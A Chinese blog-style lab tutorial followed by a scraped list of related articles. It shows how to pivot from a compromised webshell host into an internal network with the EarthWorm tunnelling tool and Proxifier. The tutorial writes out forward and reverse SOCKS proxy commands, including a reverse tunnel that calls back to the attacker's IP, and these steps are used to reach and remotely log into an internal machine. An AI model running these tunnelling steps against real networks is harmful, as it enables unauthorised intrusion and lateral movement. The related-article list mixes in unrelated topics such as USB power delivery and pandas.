EarthWorm结合proxifier的使用学习

article/2025/9/26 10:37:15

拿下一个目标机器的web权限后,如何在本机就可以通过这台被拿下webshell的机器访问内网的其他主机的端口服务呢?

拿下一个shell后,想要访问这个shell主机的其他内网机器的服务,可以用earthworm作为一个流量转发,把ew对应的系统文件上传到这台有shell的主机进行正向或者反向的代理配置。使得攻击机可以通过这台有shell的主机在本地就可以访问目标内网其他机器

Earthworm是什么

网穿透神器 EarthWorm,(简称 EW) 是一套轻量便携且功能强大的网络穿透工具,基于标准 C 开发,具有 socks5 代理、端口转发和端口映射三大功能。
在这里插入图片描述支持各种不同的系统环境
在这里插入图片描述

正向代理和反向代理用途的区别

  • 正向代理的典型用途是为在防火墙内的局域网客户端提供访问Internet的途径。
  • 反向代理的典型用途是将防火墙后面的服务器提供给Internet用户访问。

操作总结

  • 正向代理操作
    攻击机通过webshell工具上传对应的ew文件 →利用webshell执行一个正向的监听Ew_for_Win.exe -s ssocksd -l 8002→利用Proxifier添加攻击机外网ip和接收流量的端口→攻击机可以访问webshell内网的其他机器端口

  • 反向代理操作
    攻击机通过webshell工具上传对应的ew文件→本机执行一个 ew_for_Win.exe -s rcsocks -l 1080 -e 8888流量端口的转移→webshell执行Ew_for_Win.exe -s rssocks -d 攻击机IP -e 8888→Proxifier设置一个127.0.0.1和1080端的代理服务器→攻击机可以访问webshell内网的其他机器端口


环境配置

简单配置好一个内网环境 https://blog.csdn.net/weixin_41598660/article/details/106365740

为了方便实验用nat作一个外网,win7和win3设置为一个lan网段形成一个简单的内网
Win10为攻击机(192.168.10.1), 靶机为win7(192.168.10.162,10.0.0.11),win3(10.0.0.2)
在这里插入图片描述
Win10 ping不通win3内网
在这里插入图片描述
Win7和win3是同一个内网,能相互ping通,且win7能访问win3的内网web页面
在这里插入图片描述

实战模拟

  • 正向代理操作

Win10拿下了win7的webshell,并上传 earthworm的window执行文件
在这里插入图片描述
虚拟一下终端!
在这里插入图片描述
执行命令!Ew_for_Win.exe -s ssocksd -l 8002
在这里插入图片描述
然后打开Proxifier工具,进行端口和SOCKS的配置
在这里插入图片描述

[05.30 23:43:38] WINWORD.EXE *64 - self.events.data.microsoft.com:443 打开通过代理 192.168.10.162:8002 SOCKS5

Chrome浏览器右击选择Proxifier代理打开页面。
在这里插入图片描述
然后在浏览器输入win3内网web的地址,发现,win10能访问了!
在这里插入图片描述

  • 反向代理操作

因为已经拿下了win7的shell,也已经上传了earthworth的window文件。所以进行一下反向代理
在这里插入图片描述
Win10中 ew_for_Win.exe -s rcsocks -l 1080 -e 8888

PS D:\ew\ew-master> .\ew_for_Win.exe -s rcsocks -l 1080 -e 8888

把代理1080端口(也可以是其他端口)转移到8888端口
在这里插入图片描述
蚁剑中操作如下,让win7的发送一个反向代理的端口,对接到win10(192.168.10.1)

Ew_for_Win.exe -s rssocks -d 192.168.10.1 -e 8888

在这里插入图片描述
然后win10这边会有反应说ok
在这里插入图片描述
然后再对Proxifier进行本地接收端口的配置
在这里插入图片描述
尝试win10攻击机访问内网03的web页面!成功
在这里插入图片描述
在攻击机上对内网10.0.0.2机器进行一个远程的连接!成功
在这里插入图片描述


http://chatgpt.dhexx.cn/article/d8V994Hh.shtml

相关文章

内网渗透-Earthworm的简单使用(内网穿透工具)

Earthworm的简单介绍(一) 文章目录 EarthWorm下载地址1. 普通网络 1.1 跳板机存在公网IP 1.1.1 网络环境1.1.2 使用方法1.1.3 流量走向 1.2 跳板机不存在公网IP,可出网 1.2.1 网络环境1.2.2 使用方法1.2.3 流量走向 2. 二级网络 2.1 一级跳…

基于EarthWorm的正反向socks5代理

EarthWorm EarthWorm(ew)是一套便携式的网络穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功能,能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处,可在复杂网络环境下完成…

earthworm系列-earthworm介绍

earthworm的官方网站:http://www.earthwormcentral.org 1 Earthworm 简介 Earthworm 项目始于1993 年,主要目的是为了解决美国地震区域台网出现的问题。当时,区域内的地震台网存在的主要问题有:观测设备陈旧,…

内网渗透工具Earthworm简单使用

EW 是一套便携式的网络穿透工具,具有 SOCKS v5服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。该工具能够以“正向”、“反向”、“多级级联”等方式打通一条网络隧道,直达网络深处,用蚯蚓独有的手段突破网络限…

【内网—内网转发】——代理转发_ew(Earthworm)代理转发

文章目录 一、环境准备:二、工具:三、概念:四、学习目的:五、ew(Earthworm)介绍:六、ew(Earthworm)使用说明:七、ew(Earthworm)正向代理(适用于被控服务器拥有一个公网IP):1. 场景:…

苹果xsmax是什么接口_为什么苹果PD快充线头是银色而非金黄色?原来那根本就不是镀的银...

苹果开放第三方授权后,目前市面上已有不少苹果MFi认证的PD快充线,1小时就能充满iPhone X。苹果PD数据线,即USB-C to Lighting数据线,是苹果自家定义的一套数据线规范,一端为Type-C接口,另一端为苹果Lightin…

PD诱骗方案

方案1 如果在小制作中使用pd诱骗,可以参考国产方案 一个网友的设计 芯片手册提供的原理图如下 原理图1 原理图2 原理图3 原理图4 如果在一些小制作中使用还是比较方便的。 方案2 上面方案缺点仅支持PD2.0,不具有PPS,用于一些简单应用还是…

USB-PD 协议解析 - 简单易懂协议详解

目录 1. 简介 2. USB PD3.0 通信流程 2.1 发送数据包 2.2 接收数据包 2.3 双相标记编码(BMC) 2.4 符号编码(4B5B) 3. 数据包格式 3.1 前导码(Preamble) 3.2 SOP*(Start of Packet Sequence) 3.3 …

雷达干扰技术(一)PD雷达的特征

文章目录 1 多普勒频率2 PD雷达基本原理和组成3 PD雷达的信号特征 1 多普勒频率 雷达使用多普勒频率来提取目标的径向速度(距离变化率),以及区分运动和静止目标与物体,例如杂波。 多普勒现象描述了由于目标相对于辐射源的运动而…

详解PD3.0协议

通过65W充电头,给电池充电,中间有个充电芯片CCG3PA,电池可充可放,也就是PD的Power role可以是Source也可以是Sink。 在充电时的PD协议中的Device Discovery,通过SOP_Prime类型的消息进行交互,5个VDO包含了必要信息。其中cable VDO会告知自己是3A还是5A的线,不同的线能承…

PD-1和PD-L1到底是什么?

PD-1全称程序性死亡受体1,英文名字为Programmed Death 1,是一种重要的免疫抑制分子,为CD28超家族成员。以PD-1为靶点的免疫调节在抗肿瘤、抗感染、抗自身免疫性疾病及器官移植存活等方面均有重要的意义。其配体PD-L1也可作为靶点,…

药物相关 PK(药代动力) 、PD(药效)指标知识

1、PK(药代动力) Pharmacokinetic PK(Pharmacokinetics)主要研究药物在体内的吸收、分布、代谢和排泄过程,主要包括药物的药代动力学参数,如清除率、半衰期、分布容积等 PK代表药物的药代动力学&#xff…

pd.melt

一、函数 pd.melt( [frame, id_varsNone, value_varsNone, var_nameNone, "value_namevalue", col_levelNone] 参考官方文档 melt: V (使)熔化,融化 pd.melt将多列数据进行融合。 二、参数 id_vars: tuple, list, or ndarray, optional 用作标识符的列…

一文读懂USB3.1、USB Type-C、USB PD到底是什么?

USB3.1、USB Type-C、USB PD这几个英文单词应该是目前与USB接口相关的较热门的英文单词,大家或多或少都会在有意或者无意下接触到与其相关的一些信息,但是相对于大部分人来说也仅仅是知道有这么一个东东,但是对其功能及用途却并不了解&#x…

USB-PD 协议

USB-PD(Power Delivery)是基于USB Type-C的一种电源供电标准,最大供电功率可达100瓦(W);随着USB Type-C的普及,越来越多的设备(手机、平板、显示器、工作站、充电器等)使…

PD功能介绍

PD(Placement Driver),集成了ETCD, ETCD的Raft保证了数据的一致性; PD作用 整个集群TiKV元数据的存储分配全局ID和事物ID生成全局时钟TSO-事物开始时间、提交时间等搜集集群信息进行调度搜集Label功能支持高可用提供TiDB Dashboard功能 TSO physical …

python中pd是什么意思_python pd

广告关闭 腾讯云11.11云上盛惠 ,精选热门产品助力上云,云服务器首年88元起,买的越多返的越多,最高返5000元! 这里我们的目的是通过智能过滤器来减少查询cpu时间我想要通过其他数据框列名来过滤pd.read_sql中的列可能吗? 第1步:df1数据帧age1和age3是我未来的pd.read_s…

OBS多路推流插件使用方法(超级详细,亲测可用)

前提:OBS版本需要高于25.0 一、下载地址: https://download.csdn.net/download/longgeaisisi/12597711 二、下载后解压内含文件如下: 三、把这两个文件复制到你OBS安装目录下,覆盖: 四、重启OBS软件,这时…

视频直播推流与拉流的实现

序言 最近在研究直播的弹幕,东西有点多,准备记录一下免得自​​己忘了又要重新研究,也帮助有这方面需要的同学少走点弯路。关于直播的技术细节其实就是两个方面一个是推流一个是拉流,而弹幕的实现核心在即时聊天,使用聊…

直播推流优化|音视频开发

直播推流端是整个直播内容的生产源头。我们熟知的推流工具有:PC 推流工具 OBS、手持设备和各个直播平台的手机推流 App、针对一些复杂场景有更专业的导播台硬件等等。虽然工具众多,但推流端的整个工作流程还是比较固定的: 摄像头、麦克风采集…